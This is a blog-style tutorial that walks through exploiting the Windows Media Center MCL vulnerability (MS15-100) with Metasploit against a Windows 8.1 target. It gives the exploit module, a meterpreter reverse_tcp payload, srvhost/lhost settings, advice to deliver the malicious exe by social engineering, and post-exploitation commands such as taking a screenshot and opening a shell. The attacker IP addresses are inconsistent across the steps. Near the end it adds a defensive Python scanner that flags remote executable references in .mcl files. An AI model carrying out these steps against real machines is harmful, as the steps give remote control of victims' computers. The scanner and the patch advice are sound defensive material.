NOTE: THIS POST IS ONLY FOR EDUCATIONAL PURPOSES. USE THIS AT YOUR OWN RISK.
This post is about the Microsoft Windows Media Center MCL vulnerability (MS15-100). We discuss the vulnerability and then exploit it to compromise a Windows 8.1 Pro machine.
The vulnerability could allow remote code execution if Windows Media Center opens a specially crafted Media Center link (.mcl) file that references malicious code. An attacker who successfully exploited this vulnerability could gain the same user rights as the current user.
This security update is rated Important for all supported editions of Windows Media Center when installed on Windows Vista, Windows 7, Windows 8, or Windows 8.1.
AFFECTED OPERATING SYSTEMS
Windows Vista Service Pack 2
Windows Vista x64 Edition Service Pack 2
Windows 7 for 32-bit Systems Service Pack 1
Windows 7 for x64-based Systems Service Pack 1
Windows 8 for 32-bit Systems
Windows 8 for x64-based Systems
Windows 8.1 for 32-bit Systems
Windows 8.1 for x64-based Systems
We will use Metasploit and its MS15_100 exploit module to exploit the MCL (MS15_100) vulnerability. We create a malicious executable file and, with some kind of social engineering trick, get this file to our target; as soon as the target executes it, he or she is pwned.
We will use Windows 8.1 Pro as the target machine, which is running live, and a Kali Linux 2.0 machine as the attacker machine, which is also running live. Kali Linux IP address: 126.96.36.199
Steps of Exploitation
First, open a terminal on the Kali Linux machine and type msfconsole. This command starts Metasploit; it takes a little time, so wait a few moments until Metasploit is running, as you can see in the picture.
Now we have to load the exploit for the MCL vulnerability, which is pre-installed in Metasploit. To load it, type use exploit/windows/fileformat/ms15_100_mcl_exe. This command loads our exploit.
Set the payload for a reverse connection from the target machine: type set payload windows/meterpreter/reverse_tcp
Now check the required options for the exploit and payload. To check these, type show options; it displays all required options.
Here we have to configure the exploit and payload. We have to set srvhost (server host address), the address on which our exploit is hosted. To set srvhost, type set srvhost <your kali linux machine ip address>
Set the local host (lhost) address for the payload. This is also our Kali Linux machine’s IP address, which is used to receive the reverse connection.
To find your Kali Linux machine's IP address, open a new terminal and type ifconfig
Step 5. Now set the srvhost and lhost, as you see in the picture.
type set srvhost 188.8.131.52
type set lhost 184.108.40.206
All weapons are loaded; just fire them by typing the exploit command. When you type exploit, it creates a malicious executable file with an MCL link. Get this file onto the target machine with some kind of social engineering technique.
Open the link generated by the exploit on the target machine. In my case this link is \\220.127.116.11\GkRhdy\msf.exe; download the exe file.
Now check the meterpreter sessions: type the sessions -i command
To get the meterpreter session, type the sessions -i <id> command, for example sessions -i 1, and you get the meterpreter session.
In a meterpreter session we can do lots of things. Here we type the help command to check what interesting commands we can run.
I ran the screenshot command in meterpreter to get a screenshot of the target machine, and it was saved in the /root directory. After that I ran one more command, the shell command, to get the cmd of the target machine, and we got the cmd of the target machine.
After getting the cmd of the target machine, I typed the systeminfo command and got all the details of the target machine.
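On the defender's side, the crafted .mcl file described at the top of this post and the UNC link produced in the exploit step can be flagged before a user opens the file, for example at a mail gateway or in a file-share sweep. The following is an added example, not part of the original walkthrough or of Metasploit; it assumes the reference sits in the run or url attribute of an application element, and the function name, server, share and file names are constructed placeholders.

```python
import re
import xml.etree.ElementTree as ET

EXEC_EXT = (".exe", ".scr", ".com", ".bat", ".cmd", ".msi")
# UNC path (\\host\share), protocol-relative path, or scheme://
REMOTE = re.compile(r"^(\\\\|//|[a-z][a-z0-9+.-]+://)", re.I)

def audit_mcl(text):
    """Return [(attribute, value, [reasons])] for suspicious references in one .mcl file."""
    # Refuse DTDs before parsing: the scanner itself is handling untrusted XML.
    if re.search(r"<!\s*(DOCTYPE|ENTITY)", text, re.I):
        return [("document", "", ["contains a DTD or entity declaration"])]
    try:
        root = ET.fromstring(text)
    except ET.ParseError:
        return [("document", "", ["not well-formed XML"])]
    findings = []
    for el in root.iter():
        if el.tag.lower() != "application":
            continue
        for name, value in el.attrib.items():
            if name.lower() not in ("run", "url"):
                continue
            target = value.strip()
            reasons = []
            if REMOTE.match(target):
                reasons.append("remote location")
            if target.lower().split("?")[0].endswith(EXEC_EXT):
                reasons.append("executable extension")
            if name.lower() == "url" and reasons == ["remote location"]:
                continue  # an ordinary web link, the normal use of an .mcl file
            if reasons:
                findings.append((name, value, reasons))
    return findings

# Constructed samples; host, share and file names are placeholders.
SAMPLES = {
    "unc-run.mcl": r'<application run="\\fileserver.example\share\setup.exe" />',
    "web-link.mcl": '<application url="https://media.example/guide" name="Guide" />',
    "local-run.mcl": r'<application run="C:\Tools\viewer.exe" />',
}

if __name__ == "__main__":
    for fname, body in SAMPLES.items():
        print(fname, audit_mcl(body) or "clean")
```

A run target that is both remote and executable is the highest-priority finding; the durable fix remains installing the MS15-100 security update on the affected systems listed above.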
Author — Kamaljeet Kumar – Information Security Engineer, Codec Networks, Delhi